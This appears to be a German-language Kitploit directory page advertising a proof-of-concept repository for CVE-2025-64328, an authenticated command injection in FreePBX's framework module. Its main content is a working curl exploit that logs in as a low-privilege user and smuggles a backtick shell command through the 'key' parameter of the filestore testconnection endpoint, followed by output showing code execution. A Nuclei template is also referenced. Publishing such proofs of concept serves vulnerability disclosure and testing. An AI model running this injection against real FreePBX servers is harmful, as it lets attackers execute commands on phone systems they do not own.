Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-64328_FreePBX-framework-Command-Injection — CVE-2025-64328 FreePBX Authenticated Command Injection in the framework module. | Kitploit
Tools/GitHubGitHub/mcorybillington/cve-2025-64328_freepbx-framework-command-injection
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubmcorybillington/cve-2025-64328_freepbx-framework-command-injection

CVE-2025-64328_FreePBX-framework-Command-Injection

CVE-2025-64328 FreePBX Authenticated Command Injection in the framework module.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
1vor 9 MonatenNoch nicht geprüft

CVE-2025-64328 FreePBX Authenticated Command Injection im framework Modul

Einfaches Proof-of-Concept-Repository für CVE-2025-64328 FreePBX authentifizierte Command Injection im framework Modul.

Ausführlicher Artikel hier: https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/

curl Proof-of-Concept

root@kitploit:~
$ curl -s \
-XPOST --cookie-jar /tmp/freepbx-cookie --data 'username=lowprivuser&password=<lowprivuserpassword>' http://192.168.122.206/admin/config.php -o /dev/null \
--next \
--cookie /tmp/freepbx-cookie -H 'Referer: http://192.168.122.206' 'http://192.168.122.206/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user=asdf&port=22&key=asdf`echo%20rcetest2>/var/www/html/rcetest.txt`&path=test' | jq
{
  "status": true,
  "message": "Login failed"
}

$ curl -sk http://192.168.122.206/rcetest.txt
rcetest2

Nuclei-Vorlage:

CVE-2025-64328.yaml

Tool herunterladen